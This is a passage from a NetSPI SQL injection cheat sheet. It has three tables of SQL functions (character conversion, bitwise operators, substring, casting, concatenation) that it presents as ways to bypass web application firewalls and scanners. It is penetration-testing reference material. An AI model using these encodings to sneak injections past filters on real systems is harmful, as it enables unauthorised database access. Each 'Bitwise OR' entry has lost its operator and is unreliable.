Parameter Manipulation

Manipulating parameters aids in bypassing Web Application Firewalls, Anti-Virus scanners, and allows modification of various SQL queries for unique situations.

Description Query
ASCII > Char SELECT char(65)
Char > ASCII SELECT ascii('A')
Hex > Int SELECT 0x20 + 0x40
Bitwise AND SELECT 6 & 2
Bitwise OR SELECT 6
Bitwise Negation SELECT ~6
Bitwise XOR SELECT 6 ^ 2
Right Shift SELECT 6>>2
Left Shift SELECT 6<<2
Substring SELECT substr('abcd', 3, 2)
substr(string, index, length)
Casting SELECT cast('1' AS unsigned integer)
SELECT cast('123' AS char)
Concatenation SELECT concat('net','spi')
SELECT 'n' 'et' 'spi'

For more examples please go here.

Parameter Manipulation

Manipulating parameters aids in bypassing Web Application Firewalls, Anti-Virus scanners, and allows modification of various SQL queries for unique situations.

Description Query
ASCII > Char SELECT char(65) from dual
Char > ASCII SELECT ascii('A') from dual
Bitwise AND SELECT 6 & 2 from dual
Bitwise OR SELECT 6 from dual
Bitwise Negation SELECT ~6 from dual
Bitwise XOR SELECT 6 ^ 2 from dual
Substring SELECT substr('abcd', 3, 2) from dual
substr(string, index, length)
Casting select CAST(12 AS CHAR(32)) from dual
Concatenation SELECT concat('net','spi') from dual
SELECT 'n' 'et' 'spi' from dual

Parameter Manipulation

Manipulating parameters aids in bypassing Web Application Firewalls, Anti-Virus scanners, and allows modification of various SQL queries for unique situations.

Description Query
ASCII > Char SELECT char(65)
Char > ASCII SELECT ascii('A')
Hex > Int SELECT 0x20 + 0x40
Bitwise AND SELECT 6 & 2
Bitwise OR SELECT 6
Bitwise Negation SELECT ~6
Bitwise XOR SELECT 6 ^ 2
Substring SELECT substring('abcd', 3, 2)
substring(string, index, length)
Casting SELECT cast('1' AS unsigned integer)
SELECT cast('123' AS char)
Concatenation SELECT concat('net','spi')

© 2019 Copyright by NetSPI. All rights reserved.